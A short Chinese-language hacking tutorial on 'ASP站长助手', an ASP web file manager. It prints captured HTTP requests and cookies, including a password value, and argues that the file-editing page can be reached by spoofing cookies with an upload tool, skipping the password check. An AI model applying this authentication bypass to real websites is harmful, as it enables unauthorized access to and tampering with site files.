ASP站长助手如何使用
资源介绍
封包信息如下(进行节选)
(1)
POST /21.asp HTTP/1.1
Cookie: BoardList=BoardID=Show; TZ=480; SP1=1; ASPSESSIONIDQABSCDTQ=CCFNJNLBCCGKKIGMHONEHLPA
LoginPass=
以上的就是没有输入密码,所拦截到的COOKIE信息。
(2)
POST /21.asp HTTP/1.1
Cookie: BoardList=BoardID=Show; TZ=480; SP1=1; ASPSESSIONIDQABSCDTQ=CCFNJNLBCCGKKIGMHONEHLPA
LoginPass=gxgl.com
以上就是输入了正确密码之后的封包信息。
从上面来看,大家发现了什么东西了?!COOKIE的前半部分(LOGINPASS之前)有着相同的地方BoardList=BoardID=Show; TZ=480; SP1=1;这个东西会一直出现在我们的文章当中,以封包来看,想欺骗进行程序当中的可能性就很低了,我们可以看看其它的功能页面是如何的?
新建文件的抓包如下:
GET /21.asp?Action=EditFile HTTP/1.1
Cookie: BoardList=BoardID=Show; TZ=480; SP1=1; ASPSESSIONIDQABSCDTQ=KCFNJNLBBNOGEFKOEGEMPGCH
上面的又和之前的有什么分别啊~?哈哈哈哈~~~我们可以尝试了利用这个问题去试试欺骗进去功能页面啊~因为写稿子的时候,程序还没有弄出来,所以只好用一个白痴的办法。
用上传工具进行测试啊~有COOKIE填写啊~~可以用来欺骗程序。